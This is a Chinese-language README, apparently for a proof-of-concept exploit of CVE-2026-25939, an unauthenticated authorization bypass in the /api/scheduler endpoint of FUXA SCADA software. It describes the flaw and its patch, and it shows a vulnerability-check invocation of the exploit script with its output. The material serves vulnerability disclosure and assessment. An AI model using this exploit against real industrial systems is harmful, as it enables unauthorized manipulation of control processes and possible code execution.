
CVE-2026-25939 的概念验证漏洞利用程序,该漏洞是 FUXA SCADA 软件中的一个未经验证的授权绕过漏洞,允许任意调度器操作并可能导致远程代码执行(RCE)。
Mohammed Idrees Banyamer 安全研究员
本仓库包含针对 CVE-2026-25939 的概念验证(PoC)漏洞利用代码,这是 FUXA(开源 SCADA/ICS 软件)中的一个严重授权绕过漏洞。该漏洞允许未经身份验证的远程攻击者创建、修改和删除任意调度器条目,可能导致远程代码执行和工业控制系统被操纵。
该漏洞存在于 /api/scheduler 端点中,POST 和 DELETE 处理器均缺少访客用户身份验证检查。v1.2.11 中的补丁添加了显式的 authJwt.isGuestUser() 验证。
POST /api/scheduler - 创建/修改调度器DELETE /api/scheduler - 删除调度器示例 1:漏洞评估
docker run -p 1881:1881 -d fuxa:v1.2.10
$ python CVE-2026-25939.py http://192.168.1.100:1881 --check
[*] 正在检查 http://192.168.1.100:1881 的漏洞状态
[*] 正在测试访客对调度器 API 的访问...
[*] GET 响应状态:200
[*] 正在测试调度器创建...
[*] POST 响应状态:200
[!] 存在漏洞:目标接受未经身份验证的调度器创建
[!] 这表明版本 < 1.2.11